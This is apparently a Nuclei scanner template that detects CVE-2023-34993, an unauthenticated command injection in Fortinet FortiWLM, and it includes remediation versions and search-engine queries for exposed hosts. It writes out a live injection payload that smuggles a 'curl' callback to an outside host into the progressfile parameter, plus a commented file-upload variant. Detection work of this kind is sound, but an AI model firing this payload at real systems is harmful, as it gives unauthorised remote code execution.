id: CVE-2023-34993 info: name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability author: dwisiswant0 severity: critical description: | A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6. For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5. reference: - https://fortiguard.com/psirt/FG-IR-23-140 - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34993 cwe-id: CWE-78 epss-score: 0.96644 epss-percentile: 0.99631 cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet product: fortiwlm shodan-query: - http.title:"FortiWLM" - http.html:"fortiwlm" - http.title:"fortiwlm" fofa-query: - body="fortiwlm" - title="fortiwlm" google-query: intitle:"fortiwlm" tags: cve,cve2023,fortinet,fortiwlm,rce,unauth variables: progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log" http: - method: GET path: - "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}" matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: curl" # digest: 490a0046304402205a332f7b02191f50bbdffc0c070e03f669898fd78fd7b47176911f36a6231f5702203ad403ffd2de74ac672ebe4c762a1c1b56bb9ab395485fa85fade4d08e0e046b:922c64590222798bb761d5b6d8e72950